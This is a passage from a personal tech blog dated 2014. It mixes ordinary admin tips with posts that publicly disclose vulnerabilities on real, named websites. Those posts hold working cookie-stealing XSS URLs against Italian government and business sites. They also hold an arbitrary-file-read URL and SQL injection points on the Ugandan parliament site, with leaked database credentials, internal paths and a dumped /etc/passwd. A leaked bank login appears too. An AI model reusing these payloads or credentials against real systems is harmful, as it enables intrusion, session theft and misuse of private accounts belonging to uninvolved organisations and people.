Monday, 31 March 2014

error #1146 - Table 'phpmyadmin.pma__recent' doesn't exist

#1146 - Table 'phpmyadmin.pma__recent' doesn't exist

It could happen that the phpmyadmin database doesn't exists and/or phpmyadmin is misconfigured.

To fix the problem we just need to import the file "create_tables.sql" that can be found in (any) the phpmyadmin package inside the "examples/" folders.


mysq -u root --password=mypassword < create_tables.sql


Saturday, 29 March 2014

css centering image in a div in the middle of the page - dirty method

Sample css to center blocks, images within divs. I'm not sure if it's a good method.

-css-
.centering{
text-align: center;
}

.centering img{
  display: inline-block; /*inline block so that we can align it*/

/*vertical*/
position: absolute;
top: 0;
bottom: 0;
left: 0;
right: 0;
margin: auto;
  /*vertical*/
}
-----------


-html-

<div class="centering">
<img src="your_image.png" />
</div>



Friday, 28 March 2014

batch script - alert with sound for smart hdd probelms fix

batch script - alert with sound for smart hdd probelms fix
smartmontools detect failure at boot


This is a small batch script that starts an alert if  a "FAILED" string is found in the smartctl report.

@Echo on
SET SMARTBIN=smartmontools\smartctl.exe
SET REPORTFILE=smartinfo.txt
%SMARTBIN% --scan > smartdrives.txt
for /F "tokens=1" %%i in (smartdrives.txt) do %SMARTBIN% -s on %%i > %REPORTFILE% && %SMARTBIN% -i %%i >> %REPORTFILE% && %SMARTBIN% -H %%i >> %REPORTFILE%

findstr /m "FAILED" %REPORTFILE%
if %errorlevel%==0 (
sound\cmdmp3win.exe sound\alert.mp3
)


I personally cannot suggest smatmontools "as is" without the parsing of the S.M.A.R.T. data or full test with smartmontools.

After creting this sample script I have faced the reality that my HD smart report was not correct .
I prefer to manually check with crystaldisk because it reports as "good" or "problematic" without wasting time and with more accuracy (I hope).

Command line mp3 players for windows

Command line mp3 players for windows

http://www.mailsend-online.com/blog/a-command-line-mp3-player-for-windows.html

http://mplayerhq.hu/design7/dload.html


http://sourceforge.net/projects/mpg321/

Thursday, 27 March 2014

xopie.com | democratic people's of korea (north korea) | XSS

The sample url is related to the official shop  of the democratic republic of korea (north korea) but the problem is for all the shops on xopie.com.

http://dprk.xopie.com/en/list?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22

Wednesday, 26 March 2014

IIS 7 Mime type modification without iis 7 manager | fix svg wrong mime type | svg not appearing

I'm quite ignorant about IIS 7 but after using ii7 manager I've noticed that it's easier than expected to modify
the preconfigured mime types and *any* (I don't know exactly what can be modified or not) other configuration
by adding/modifying "web.config" in the root directory.

This sample file web.config is a modification for the svg that have a wrong mime type and the svg are not showing correctly.



web.config
--------------------------------------------------------------------------

<configuration>
    <system .webserver="">
        <staticcontent>
            <remove fileextension=".svg2">
            <remove fileextension=".svg">
            <mimemap fileextension=".svg" mimetype="image/svg+xml">
            <mimemap fileextension=".svg2" mimetype="image/svg+xml">
        </mimemap></mimemap></remove></remove></staticcontent>
    </system>
</configuration>
--------------------------------------------------------------------------

With this modification in web.config (and there's no need to use any manager)
we can reconfigure the mime type to "image/svg+xml".
On an aruba, ngi servers I've got "image/svg xml" .... that seems to be wrong and gives problems on most of the browsers.

More things can be modified/added.



Tuesday, 25 March 2014

installare IIS 7 manager for website administration.
I've faced a simple problem regarding an incorrect svg mime type. The hosting company for a specific website have told me to modify it by myself via iis 7 manager (weird in my opinion). Trovandomi di fronte al problema di dover modificare il mime type per svg. L'assistenza dell'azienda di hosting, Aruba (in questo caso), mi ha risposto di fare le modifiche autonomamente tramite ii7 manager. La cosa mi è sembrata strana perché sarebbe stato utile ed immediato fare le modifiche dal pannello di controllo e non tutti gli utenti hanno sistema operativo Microsoft, i requisiti necessari (a volte mancano pacchetti vari da installare a parte come XML) e le idee non chiarissime su come procedere. ____________________________________________________________

Start->Pannello di controlo

installare IIS 7 manager


Programmi e funzionalità
installare IIS 7 manager


Attivazione o disattivazione delle funzionalità Windows
installare IIS 7 manager


Selezionare "console di gestione IIS" (sotto "Internet Information Services").
Premere "OK" e (pregare) attendere la fine dell'installazione.
installare IIS 7 manager


Scaricare Download IIS 7 manager
Installare iis 7 manager eseguendo il file (inetmgr_amd64.msi 64bit o inetmgr_i386.msi 32bit).
Cliccare sempre su avanti (non è difficile)
Per avviare IIS 7 Manager. (start -> inetmgr +invio) Andare in Start -> Pannello di controllo -> strumenti di amministrazione
installare IIS 7 manager


Avviare Gestione Internet Services
installare IIS 7 manager


Cliccare su "Connetti a un sito.."
installare IIS 7 manager


Inserire nome server e nome sito.
installare IIS 7 manager


Inserire Nome utente e password. Cliccare su avanti.

Appariranno diverse richieste di installazione. Selezionate sempre tutto e cliccate su ok/avanti. A volte può capitare che l'installazione non vada a buon fine. In caso di problemi (sigh) verificare quali siano le *dipendenze* mancanti e per cui non è possibile proseguire ed installarle a parte.
installare IIS 7 manager

Monday, 24 March 2014

Useful tools for mssql


DbaMgr

DbaMgr2k
http://www.asql.biz/en/Download.aspx#DbaMgr

osql batch database extractor
http://www.rs-freeware.org/osql/#install

Java client
http://squirrel-sql.sourceforge.net/


database.net is really good for several different databases. A very nice tool.
http://fishcodelib.com/database.htm

It looks interesting but it doesn't connect (maybe i'm writing the wrong connection data)
http://sqlserverdump.codeplex.com/

good for automatic backup (.bak) to local/shared folder, ftp.
http://sqlbackupandftp.com/


several interesting tools.
http://www.red-gate.com/labs/free-tools/

simple html javascript redirect

 Simple javascript and html meta tag to redirect.

Sample:
<html>
<head>
<script type="text/javascript">
function Redirect() { location.href = "static/"; }
window.setTimeout("Redirect()", 1000);
</script>
<meta http-equiv="refresh" content="1; url=static/">
</head>
<body>
<div id="redirectlink" ><a href="static/">redirect page</a></div>

</body>
</html>

Published as personal reminder.

Xamarin studio silent automated installation and download

Xamarin studio offline installation

simplet batch script to (download) and install, also offline, xamarin studio with mono android, xamarin ios, gtk sharp, android sdk tools, android ndk (I'm not sure if it's the right installation method but I've read it in the installation logs of xamarin).

If you need to just install remove the part related to "wget" in the install batch script.

download Xamarin studio silent installation


I needed to automate such process. sometimes msiexec hangs but I don't have the time to verify why (at the moment) ... just kill it from the task manager. Comment for errors, suggestions.

Sunday, 23 March 2014

Android SDK Setup automated Installer

Android SDK Setup automated Silent Installer.
Android sdk silent installation.

If you need to install without clicking i've added a very simple setup executable that should work with all the installers of the Android SDK Tools






Download any sdk tool
For Example I've download "installer_r22-windows.exe"
Rename it as "androidsdk.exe"

Run setup.exe from the same folder. The setup runs androidsdk.exe and go ahead without your interaction.
At the end of the setup it opens automatically the tools.

I've simply used  an autoit script. Nothing really particular but I needed to automate various installations.

Download automate android sdk tools installation


It's just for personal use but comments are welcome.

Friday, 14 March 2014

asansambox asangsm Drivers and usage as MXbox that allows (?) Nokia flashing too

I've buyed the Asansambox but due to the big waste of time searching for the right driver I've been unable to install it for more than a week (frustration).
The company told me to use their drivers (there are several links and drivers for the SAME box).

In my case I've to install "smart key" (question mark in the devices manager).
The hardware id hwid (in my case) is SCFILTER\CID_80318065b0831148c883009000

After a search on google I've found a similar product that is the HTI mxkey card (another box?)


I've (simply) set in the inf the hwid as CardName "JCOP41V221". There's no specifi driver needed (in general).

Here you can download the Asansam box drivers

I  don't really know which device is "JCOP41V221" but it looks like the latest (?) version of the mx key ... sort of  ....

I just have problems with already buyed and, for the moment, a -paperweight- named Asansam.

The asansambox is capable to request data from *dead* MTK (chinese) phones.
Set in "general services"->NVM (Standard)
I've tested with an ACER E350 gallant duo (MTK6577?).
There results are garbage but with a decent support from the software or with custom sw maybe the box can do something more.
SP MTK flasher (used to flash mtk phones), with specific scatter file, can be set to communicate (disable as usb in the settings) but it's unable to do the basic tests (nvram).
I've been able to send some garbage and the phone entered in a stable (modem?) mode  (when there's no battery, phone vibrates and the computer detects it a new device) while in the previous situation he continued to connect/disconnect as device.

I don't have an MXbox/MXkey/MXwhatever.I don't know how to use MobileEx and where to get a MXKey account.

I can only SUPPOSE and not be sure about the results.

Suggestions and comments are welcome.

http://www.adl.it | XSS

http://www.adl.it/?lang=it&section=configuratore_batterie&model=%3Cscript%3Ealert%281%29;%3C/script%3E&highlight=Ricerca

Friday, 7 March 2014

http://www.parliament.go.ug | remote file read/download - System compromise

__________________________________________________________________
oracle, mysql, hacluster, open-xchange

TNS for Linux: Version 11.1.0.6.0 - Production-Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - 64bit Production

There are too many and mixed up scripting languages and messed up *solutions*.



Read quite any file
http://www.parliament.go.ug/mpdata/mps.hei?$debug=pp&$file=/etc/passwd

SEVERAL possible sql injections (there are too many of them ...)
http://www.parliament.go.ug/mpdata/members.hei?committeeno=2%277&name=Committee+on+Rules%2c+Discipline+and+Privileges
http://www.parliament.go.ug/mpdata/mps.hei?p=f&n=t&details=t&j=632.000000&const=Woman+Representative&dist_id=65.000000&distname=Kanungu
http://www.parliament.go.ug/hansard/hans_text.jsp?srch_txt=hansards&exact=ALL&B1=Submit
http://www.parliament.go.ug/enewsletter/index.php/login


the errors are so kind to give those informations:
host: `localhost'
user: `mpdata'
database name: `tenG'
Statement: SELECT INITCAP(districtname) as distname FROM tbldistrict WHERE districtno=65.000000'


SELECT * FROM tbluser WHERE username 


SELECT mp.mpno as m_id, INITCAP(D.districtname) districtname,d.districtno, INITCAP(C.constituencyname) constituencyname,P.partyname,tblMPmembership.Membershipname, MPC.membershipno, MP.titleid as title, INITCAP(MP.surname) as fname, INITCAP(MP.othernames) as onames , MP.contact_email as email FROM tblmpcommittee MPC, tblmp M ,tblmpname MP, tblMPmembership,tblconstituency C,tblparty P,tblDistrict D WHERE MPC.committeeno=27 AND MPC.MPID=M.MPID AND M.MPNO=MP.MPNO and tblMPmembership.membershipno=MPC.membershipno and M.constituencyno=C.constituencyno and M.partyno=P.partyno and D.districtno=C.districtno and MPC.comstatus=1 and M.mpstatusno=1 ORDER BY membershipno ASC, fname ASC


db name: TENG.PARLIAMENT.GO.UG


-internal server??
http://jwabwire.parliament.go.ug:7778/pls/mp/display_image?mp_id=1

http://www.parliament.go.ug/mpdata/mps.hei?$debug=pp&$file=%2fusr%2flocal%2fhttpd%2fhtdocs%2fmpdata%2fmps.hei&$line=131&$column=41#here
http://localhost:8080/pass.asp?mpid=

http://www.parliament.go.ug/mpdata/pass.asp

C:\ICT Invetory\xx.mdb
Data source = UG;User ID=mpdata;password=mpdata




-Paths

/usr/local/httpd/htdocs/mpdata/lib
/usr/local/httpd/htdocs/layout
/usr/local/httpd/htdocs/heitml2.0/lib
/home/bbaale/public_html/advocates





This page is related to the billings for the nation. I don't know what are the consequences for the ugandese goverment if someone manages such data. Anybody can mix it up for personal interests or for (bad) political motivations.
http://www.parliament.go.ug/billtrack/



Some NON confidential data extracted from tbldistrict
Buikwe District
Bukomansimbi District
Butambala District
Buvuma District
Gomba District
Kalungu District
Kyankwanzi District
Lwengo District
Amudat District
Bulambuli District
Buyende District
Kibuku District
Kween District
Luuka District
Namayingo District
Ngora District
Serere District
Napak District
Buhweju District
Kiryadongo District
Mitooma District
Ntoroko District
Sheema District
Kyegegwa District
Rubirizi District
Agago District
Alebtong District
Kole District
Lamwo District
Nwoya District
Otuke District
Zombo District
Abim District
Amuru District
Budaka District
Buliisa District
Maracha District
Namutumba District
Oyam District
Bukedea District
Dokolo District
Lyantonde District
Bududa District
Kalangala District
Kampala District
Kiboga District
Luwero District
Masaka District
Mpigi District
Mubende District
Mukono District
Nakasongola District
Rakai District
Ssembabule District
Kayunga District
Wakiso District
Nakaseke District
Mityana District
Bugiri District
Busia District
Iganga District
Jinja District
Kamuli District
Kapchorwa District
Katakwi District
Kumi District
Mbale District
Pallisa District
Soroti District
Tororo District
Kaberamaido District
Mayuge District
Sironko District
Butaleja District
Kaliro District
Amuria District
Manafwa District
Bukwo District
Adjumani District
Apac District
Arua District
Gulu District
Kitgum District
Kotido District
Lira District
Moroto District
Moyo District
Nebbi District
Nakapiripirit District
Pader District
Yumbe District
Kaabong District
Koboko District
Amolatar District
Bundibugyo District
Bushenyi District
Hoima District
Kabale District
Kabarole District
Kasese District
Kibaale District
Kisoro District
Masindi District
Mbarara District
Ntungamo District
Rukungiri District
Kamwenge District
Kanungu District
Kyenjojo District
Ibanda District
Isingiro District
Kiruhura District
Ex-Officio District
Youth District
Pwd District
Updf District
Workers District


-TABLES-
QUEST_COM_PRODUCTS
QUEST_COM_PRODUCTS_USED_BY
QUEST_COM_PRODUCT_PRIVS
QUEST_COM_USERS
QUEST_COM_USER_PRIVILEGES
TOAD_DATA_FILES
TOAD_FILESTAT
TOAD_FREE_SPACE
TOAD_REF
TOAD_TABLESPACES
TBLCOMMITTEE
TBLCOMMITTEETYPE
TBLCONSTITUENCY
TBLCONSTITUENCYPROFILE
TBLDISTRICT
TBLHANSARD
TBLITEM
TBLMARITALSTATUS_OLD
TBLMP
TBLMPCOMMITTEE
TBLMPMEMBERSHIP
TBLMPNAME_ORIGINAL
TBLMPSTATUS
TBLORDER
TBLORDERPAPER
TBLPARLIAMENT
TBLPARTY
TBLSEX
TBLSUBCOUNTY
TBLSUBITEM
TBLTELECOMM
TBLTELEDEPT
TBLTELENAME
TBLTELENAMES
TBLTELESTAFF
TBLUSER
TESTER
TESTER2
PGA_FORMS
PGA_LAYOUT
PGA_QUERIES
PGA_REPORTS
PGA_SCHEMA
PGA_SCRIPTS
RADDETAIL
TRANSFER_DETAILS
DISTRICT
EAS_VERSION
SR_SUB_TYPE
SUB_TAB_VIEWS
SR_SUB_TAB
COMPUTER
COMPUTER_ATTRIBUTES
VERSION
ACCOUNT
SCHEDULE_TASK
COMPUTER_CHANGES
COMPUTER_GROUP
COMPUTER_LISTS
COMPUTER_LOG
COMPUTER_USERS
EVENT
LOGIN_LOG
MESSAGES
PROBLEM_TYPE
SR_SUB_TAB_HISTORY
SERVICE_REQ
SERVICE_REQ_HISTORY
SYSAID_USER
SYSAID_USER_HISTORY
AUDIT_LOG
CI_FILES
CI_LINKS
CI_TEMPLATE_LINKS
QUICK_LIST
ASSET_CATALOG_FILES
SUPPLIER_FILES
SYSAID_USER_FILES
COMPANY_FILES
SERVICE_REQ_LINKS
SR_TAB_DEPENDENCES
COMPUTER_HISTORY
COMPUTER_ATTRIBUTES_HISTORY
COMPUTER_FILES
SOFTWARE_FILES
COMPUTER_LINKS
SYSAID_USER_ROUTING
CI_ATTRIBUTES
PROCESSES_DAY_DATA
PROCESSES_WEEK_DATA
PROCESSES_MONTH_DATA
PROCESSES_YEAR_DATA
PERFORMANCE_DAY_DATA
PERFORMANCE_WEEK_DATA
PERFORMANCE_MONTH_DATA
PERFORMANCE_YEAR_DATA
COMP_UPDATE_DAY_DATA
COMP_UPDATE_WEEK_DATA
CI_HISTORY
LIST_VIEW
SERVICE_REQ_LOG
USER2ASSET
SERVICE_REQ_DATA
SOFTWARE
SOFTWARE2INSTALL_NAME
ASSET_CATALOG
SUPPLIER
FAQ
URL_MONTH_DATA
URL_YEAR_DATA
URL_EMBED_DATA
MONITOR_EVENTS
PREDEFINED_SERVICES_CHECK
PREDEFINED_NETWORK_CHECK
NEWS
SATISFACTION_SURVEY
COMP_UPDATE_MONTH_DATA
COMP_UPDATE_YEAR_DATA
NETWORK_DAY_DATA
NETWORK_WEEK_DATA
NETWORK_MONTH_DATA
NETWORK_YEAR_DATA
ASSET_DATA_DAY_DATA
ASSET_DATA_WEEK_DATA
ASSET_DATA_MONTH_DATA
ASSET_DATA_YEAR_DATA
NETWORK_ACTIVITY_DAY_DATA
NETWORK_ACTIVITY_WEEK_DATA
NETWORK_ACTIVITY_MONTH_DATA
NETWORK_ACTIVITY_YEAR_DATA
CUSTOMIZED_DAY_DATA
CUSTOMIZED_WEEK_DATA
CUSTOMIZED_MONTH_DATA
CUSTOMIZED_YEAR_DATA
URL_DAY_DATA
URL_WEEK_DATA
SERVICE_REQ_MSG
COMMANDS
USER_GROUPS
USER2GROUP
PROJECT
PROJECT_HISTORY
PROJECT_LOG
TASK_HISTORY
TASK_LOG
TASK_USERS
TASK_ACTIVITIES
TASK_FILES
ASSET_TYPES
COMPANY
CI_TYPE
CI_SUB_TYPE
CI_RELATION
CI_RELATION_TYPE
CI_TEMPLATE
MONITOR_TEMPLATES
MONITORING_CONF
MONITOR_EMBED_DATA
SERVICES_DAY_DATA
SERVICES_WEEK_DATA
SERVICES_MONTH_DATA
SERVICES_YEAR_DATA
TBLMPNAME
TBLMPCONST
TBLMPNAME2
SURVEY_QUESTIONS
SURVEY_ANSWERS
CURRENT_MEASUREMENT_LISTS
LAST_RUN_MEASUREMENT_LISTS
CURRENT_SLA_RESULTS
CUSTOM_TRIGGERS
SYSAID_EVENTS
TRAPS_DATA
FORM_HISTORY
USS_SECURITY_QUESTIONS
USS_NOTIF_EVENTS
ONLINE_USERS_HISTORY
USER_QUESTIONS
USER_ANSWER_ATTEMPTS
SYSAID_USER_PUSH_ENABLE
SYSAID_USER_PUSH_NOTIFICATIONS
ONLINE_ASSETS
ASSET_OFFLINE_LOG
USERS_REMOTE_ASSETS
REMOTE_ACTIVE_SESSIONS
SYSAID_USER_PERMISSIONS
PRIORITY_MATRIX_CUST_VALUES
CUSTOM_SERVICES
MDM_POLICY
MDM_WIFI_POLICY
MDM_ACTIONS
UI_MENUS
UI_MENUS2GROUP
QRTZ_JOB_DETAILS
QRTZ_JOB_LISTENERS
QRTZ_TRIGGERS
QRTZ_SIMPLE_TRIGGERS
QRTZ_CRON_TRIGGERS
QRTZ_BLOB_TRIGGERS
QRTZ_TRIGGER_LISTENERS
QRTZ_CALENDARS
QRTZ_PAUSED_TRIGGER_GRPS
QRTZ_FIRED_TRIGGERS
QRTZ_SCHEDULER_STATE
QRTZ_LOCKS
COMPANY_LINKS
ASSET_CATALOG_HISTORY
SOFTWARE_HISTORY
SUPPLIER_HISTORY
SR_SUB_TAB_FILES
SR_SUB_TAB_LINKS
LINKED_SERVICE_REQ
SYSAID_ITEM_LINKS
PROJECT_LINKS
TASK_LINKS
ASSET_CATALOG_LINKS
SOFTWARE_LINKS
SUPPLIER_LINKS
SYSAID_USER_LINKS
WORK_REPORT
CUST_VALUES
SORT_CUST_VALUES
SR_SUB_TAB_POPULATE
ASSET_NOTIF_EVENTS
MEASUREMENTS_LISTS
MEASUREMENTS_LISTS_HISTORY
MEASUREMENTS_DEF
MEASUREMENTS_DEF_HISTORY
AGREEMENT
CUSTOM_COLUMNS
ONLINE_USERS
TBLMPNAME_ORIG_MODIFIED
FAQ_TAGS
SERVICE_REQ_FILES
TBLWORK
TBLTITLE
TBLRELIGION
TBLRELATION
TBLPROF_MEMBERSHIP
TBLPENSION
TBLOTHERINFO
TBLMPSNAME
TBLINSTITUTION
TBLEXTRACURRICULAR
TBLEDUCATIONLEVEL
TBLEDUCATION
TBLCONFERENCE
COMPANY_HISTORY
DISCOVERY_SERVICE
CUSTOMIZED_SNMP_OIDS
ASSET2CI
STATUS_SETTINGS
USER2CI
AUDIT_LOG_LINES
FAQ_FILES
REMINDERS
AUTOMATIC_TEXTS
USER_FAVORITES
CHAT_ACTIVE_SESSIONS
CHAT_CLOSED_SESSIONS
CHAT_QUEUE
CHAT_QUEUE_MESSAGES
SHARE_AND_COMPARE
STATISTICS_DATA
GENERIC_MESSAGES
MPTELEPHONE
PROJECT_USERS
PROJECT_FILES
TASK
TBLMARITALSTATUS


sample passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
cyrus:x:96:12:User for cyrus-imapd:/usr/lib/cyrus:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dhcpd:x:103:65534:DHCP server daemon:/var/lib/dhcp:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:50:113:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
geronimo:x:108:112:Geronimo:/usr/share/websphere-as_ce-1.1:/bin/sh
hacluster:x:90:90:heartbeat processes:/var/lib/heartbeat/cores/hacluster:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
ldap:x:76:70:User for OpenLDAP:/var/lib/ldap:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
mailman:x:72:67:GNU mailing list manager:/var/lib/mailman:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
mdom:x:28:28:Mailing list agent:/usr/lib/majordomo:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
mysql:x:60:107:MySQL database admin:/var/lib/mysql:/bin/bash
nagios:x:107:111:User for Nagios:/var/lib/nagios:/bin/false
named:x:44:44:Name server daemon:/var/lib/named:/bin/bash
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
open-xchange:x:111:115:open-xchange system user:/opt/open-xchange:/bin/false
oracle:x:105:108:Oracle user:/opt/oracle:/bin/bash
pop:x:67:100:POP admin:/var/lib/pop:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
quagga:x:104:106:Quagga routing daemon:/var/run/quagga:/bin/false
radiusd:x:109:114:Radius daemon:/var/lib/radiusd:/bin/false
root:x:0:0:root:/root:/bin/bash
snort:x:73:68:Snort network monitor:/var/lib/snort:/bin/bash
squid:x:31:65534:WWW-proxy squid:/var/cache/squid:/bin/csh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:102:104:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
tomcat:x:106:110:Tomcat:/usr/share/tomcat5:/bin/sh
upsd:x:112:2:UPS daemon:/sbin:/bin/false
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
vscan:x:65:105:Vscan account:/var/spool/amavis:/bin/bash
websense_db_user:x:110:100::/OracleContentServer/Websense/bin:/sbin/nologin
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
bbaale:x:2196:100::/home/bbaale:/bin/bash
filter:x:500:500::/home/filter:/bin/false
itx:x:2195:100::/home/itx:/bin/bash
otrs:x:1749:8:OTRS System User:/opt/otrs:/bin/false
qtss:x:1690:100::/home/qtss:/bin/bash
spamd:x:1603:100::/home/spamd:/sbin/nologin
+::::::

Drop tables of a database from command line (windows or linux). MySQL.

Drop tables of a database from command line (windows or linux). MySQL.
How to drop tables from command line with a mysql database.





--setting a session (not global since we probably don't have enough privileges) with an higher length. Change the number/length as needed.
SET SESSION group_concat_max_len = 90000;

--setting a variable with the group concatenated list of the tables (ex.: table1,tables2;). Change the MYTABLENAMETOCHANGE with your own table
SET @mytables = (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'MYTABLENAMETOCHANGE');

--setting a variable so that we can have a full DROP (if table exists) statement
SET @drptables = (SELECT CONCAT('DROP TABLE IF EXISTS ', @mytables, ';'));

-- preparing "droppingtables" the sql statement from the @drptables variable
PREPARE droppingtables FROM @drptables;

-- executing the sql statement "droppingtables"
EXECUTE droppingtables;

-- releasing "droppingtables"
DEALLOCATE PREPARE droppingtables;



Sample Windows Batch file with command line including password.
Use -p instead of --password=yourpassword if you want to input it by hand.
Remember to add the error checkings or you will end up with the non execution of the queries

drop_tables.bat
________________________________________________________
________________________________________________________


@echo off
SET MYSQLPATH=C:\mysql\bin\
SET MYUSR=cart
SET MYPASS=cart
SET MYDB=cart
SET MYMAXLEN=90000

%MYSQLPATH%\mysql -u%MYUSR% --password=%MYPASS% -D %MYDB% -e "SET SESSION group_concat_max_len = %MYMAXLEN%;SET @mytables = (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '%MYDB%');SET @drptables = (SELECT CONCAT('DROP TABLE IF EXISTS ', @mytables, ';'));PREPARE droppingtables FROM @drptables;EXECUTE droppingtables;DEALLOCATE PREPARE droppingtables;"
________________________________________________________
________________________________________________________



 Sample Bash script for unix
 drop_tables.sh
________________________________________________________
________________________________________________________
#!/bin/sh
SET MYUSR="cart"
SET MYPASS="cart"
SET MYDB="cart"
SET MYMAXLEN="90000"
MYSQLEXE="$(which mysql)"


#checking if mysql client exists
if [ -z "$MYSQL" ]; then
echo "Error: MYSQL not found"
exit 1
fi


$MYSQLEXE -u$MYUSR --password=$MYPASS -D $MYDB -e "SET SESSION group_concat_max_len = $MYMAXLEN;SET @mytables = (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '$MYDB');SET @drptables = (SELECT CONCAT('DROP TABLE IF EXISTS ', @mytables, ';'));PREPARE droppingtables FROM @drptables;EXECUTE droppingtables;DEALLOCATE PREPARE droppingtables;"
________________________________________________________
________________________________________________________

Monday, 3 March 2014

Install OS/2 Warp with (or without) virtualbox

-- Install the oracle virtual box (ex. 4.2.0)
-- Create a new v.machine  with the settings for your os/2 warp version

ex.:
 Name(anything): os2warp
 Type: IBM OS/2
 Version (the version that you are installing - 4 in my case): OS/2 Warp 4

-- Add one Disk and one Floppy as storage(s) for the virtual machine. Add a CD/DVD drive if you want to install a bit faster (see below).


-- extract the os2warp.iso so that you can use the dsk images for the installation (located in \DISKIMGS\OS2\35\)

-- Load in the floppy device the disk0.dsk and swap when requested by the os2 setup.


-- when the setup asks for the floppy 1 (after 0) use the DISK1_CD.DSK as floppy and remember to put the CD or load the cd iso image in the, virtual or real, cd drive

-- Choose "easy installation" if you don't need particular things.

When you the "Fdisk" application appears it can show you that the first disk is corrupted. Just go ahead and press enter.
press tab and press -> (right) to choose your disk.
Avoid the 1024kb that is the floppy disk -- that should be type 83 and "startable".

Your destination disk should be also with free space if not previously formatted.
Once you are in the disk page you need to press tab to choose your partition.
Press "Enter" and if there's no partition choose "create partition" and "primary partition".


If you are going to use more than one os (ex. os2+dos) on the same disk create the first partition of 1mb where you are going to install the boot manager.
See those faqs for more informations:
http://www.mit.edu/activities/os2/faq/os2faq0403.html

-- Create the first primary partition of 500mb where os/2 warp will reside and (press Enter)

-- Set the partition as startable and as Installable (!!Important).

The first partition must be smaller than 512mb (I've personally used 256mb) due to *old* bios restrictions.
Fdisk will assign automatically the C: drive letter.
"Also, on many PCs, because of BIOS restrictions, your startable (primary) partition must be physically located entirely below the 1024th cylinder on your hard disk (or, roughly speaking, it must be no larger than about 511 MB)" (as already stated in the previously linked faqs).
Another good page is suggesting, with far more useful informations,

http://pclt.cis.yale.edu/pclt/BOOT/OS2.HTM

-- press f3 and exit

it could happen that the system doesn't recognize your primary partition even if you've done everything correctly. Just exit anyway and let the system restart. It should recognize your partition and start the regular installation (from floppy3).

if something goes wrong while formatting (red screen) restart (ctrl+alt+canc), choose advanced installation and try to reformat.
In case of other problems try to repartition with gparted (gparted live iso linux http://gparted.org/download.php) in fat16.


-- (If you want) Add a second "extended" partition that will fill all the remaining data and d: will be assigned automatically.

-- continue the setup



-- hit "enter" at the end of the installation process and restart













_____________________________________________


Errors:
OS/2!! SYS02025

OS/2!! SYS02027

Those errors are common if you are trying to use a non IBM machine, if the boot sector is corrupted (as I can read from the various docs), if there are HDD issues or if you are running non fully startable floppies.

http://service5.boulder.ibm.com/pspsdocs.nsf/8d77653332b629ab862563cc005ee09a/dc6f1f67b91441a2852561ac0076dd72?OpenDocument
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-44388


To solve the problem in virtualbox just make sure to run the first floppy and switch floppy as needed from the current virtual machine without closing the v.m. window (check the devices in the toolbar/menu) and make sure that you have selected the correct OS/2 system when you have created the vm.

____________________________________________________________



please make questions and suggestions in the comments. This is not a *guide* but something like a personal reminder for myself.

Saturday, 1 March 2014

http://www.mit.gov.it | XSS

http://www.mit.gov.it/mit/site.php?o=vm&lm=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E1&id_cat=45

Alice.it search/redirection service - errors (php?)

Under heavy load
http://auto.ricerca.alice.it

returns

Warning: fsockopen() [function.fsockopen]: unable to connect to 92.242.132.12:80 (Connection timed out) in /store1/www/autosearch-bare-fruit.alice.it/doc_root/index.html on line 46
DNS Error


Php

www.immobiliarediamante.com | xss

www.immobiliarediamante.com/ricerca-immobile.php?sezione="><script>alert(document.cookie);</script><"&tipo_imm=0&prezzo_min=0&x=77&y=6

www.banca121.it | data leak ---

Old informations taken from banca121.it.
The bank is now closed.

user|pass
carlucci75|160175car
.....

pdfor.it | XSS

XSS
http://www.pdfor.it/Almacube/simulation/login.asp?username=admin%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


(post)
http://www.pdfor.it/Almacube/registrazione/getPassword.asp
<script>alert(1)</script>@none.com

Windows 7 - 64 bit - Carta Nazionale Servizi

Windows 7 - 64 bit - Carta Nazionale Servizi
Infocert


Installare il proprio lettore di smartcard (alcuni driver sono disponibili qui)

https://www.firma.infocert.it/installazione/lettore.php


Installare il certificato infocert (windows doppio click su file - sempre avanti)
https://www.firma.infocert.it/installazione/certificato.php
https://www.firma.infocert.it/pdf/InfoCert_Servizi_di_Certificazione.cer (link diretto)




Installare dike
https://www.firma.infocert.it/installazione/installazione_DiKeUtil.php
Per le carte serie 1401, 1402 e token USB serie 1501 DiKe fa uso del software CardOS API: per scaricarlo, vedere le istruzioni nella pagina di DiKe. (Rif. infocert)


Se non funziona dike per le carte che iniziano per: 1203, 1204, 1205, 7420,  6090
installare questa versione ipki (x64)
http://www.visura.org/downl/bit4id_ipki_1.2.15.0-k4-ccid-ext-x86-x64.zip


Per windows XP ed Aruba PEC utilizzare la versione 1.2.6.0


_____________________________________________

Firefox


Per Firefox seguire
Strumenti -> Opzioni -> Avanzate
Selezionare "Cifratura"
Cliccare su "Dispositivi di Sicurezza"
Cliccare su "Carica"
